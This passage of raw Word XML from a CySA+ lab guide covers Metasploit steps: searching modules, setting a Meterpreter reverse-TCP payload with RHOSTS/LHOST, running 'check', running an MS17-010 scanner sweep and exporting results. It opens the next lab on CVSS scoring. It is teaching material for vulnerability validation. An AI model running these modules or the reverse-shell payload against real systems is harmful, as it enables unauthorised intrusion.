        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(...) &gt; set RHOSTS 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(...) &gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(...) &gt; set LHOST 10.10.10.99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(...) &gt; check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>check is the safe analyst command: it probes the target and reports vulnerable / not vulnerable without firing the exploit. This is how you turn a scanner "high" into a confirmed true positive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>To actually exploit (only on Metasploitable), you would run — but the validation is what CySA+ tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Use an auxiliary scanner instead of an exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Many MSF modules are non-destructive scanners:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; use auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 auxiliary(smb_ms17_010) &gt; set RHOSTS 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 auxiliary(smb_ms17_010) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This sweeps a /24 and reports which hosts are vulnerable — perfect for verifying scanner findings at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Browse useful module families</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; search type:auxiliary scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; search type:post platform:windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; search cve:2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>exploit/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Active code-execution modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auxiliary/scanner/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vulnerability / version checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auxiliary/dos/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Denial-of-service tests (rarely run in prod)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>post/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Post-exploitation (only after a session exists)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>payload/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The shellcode delivered by an exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>encoder/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AV-bypass transformations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Workspaces and reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; workspace -a customer_x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; db_nmap -sV 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; vulns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>db_nmap runs Nmap and stores results in the Postgres DB. hosts, services, and vulns query that DB — ready to export for the report (Lab 26):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; db_export -f xml /tmp/msf_report.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Map MSF activity to CySA+ exploitability/weaponization</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MSF feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 2.3 vocab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Will it run?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>check command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validation — true positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public exploit exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>module in exploit/ tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Weaponization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rank: Excellent/Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Real-world abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>references in info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Asset value × likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Exit cleanly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Install Metasploit and search for an exploit by name or CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configure a module, set RHOST/LHOST/PAYLOAD, and run a non-destructive check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use auxiliary scanners to validate scanner findings at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Persist findings via the MSF database and export them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ethical Hacking Playground (https://alfredang.github.io/ethnicalhacking/) — a browser playground of common ethical-hacking techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Ethical Hacking Playground to review the exploitation techniques safely in the browser before running the equivalent modules in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PenTest FauxBank (https://pentest-fauxbank.vercel.app/) — a deliberately-vulnerable demo banking web app for safe web-attack practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Practise the attack workflow against PenTest FauxBank, a safe deliberately-vulnerable demo bank, so you understand the target behaviour before exploiting the lab host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to install Metasploit and search for an exploit by name or CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 16 — CVSS Scoring and Prioritization</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score three vulnerabilities with the FIRST CVSS v3.1 calculator, apply environmental context, and produce a prioritised remediation list.</w:t>
      </w:r>
    </w:p>
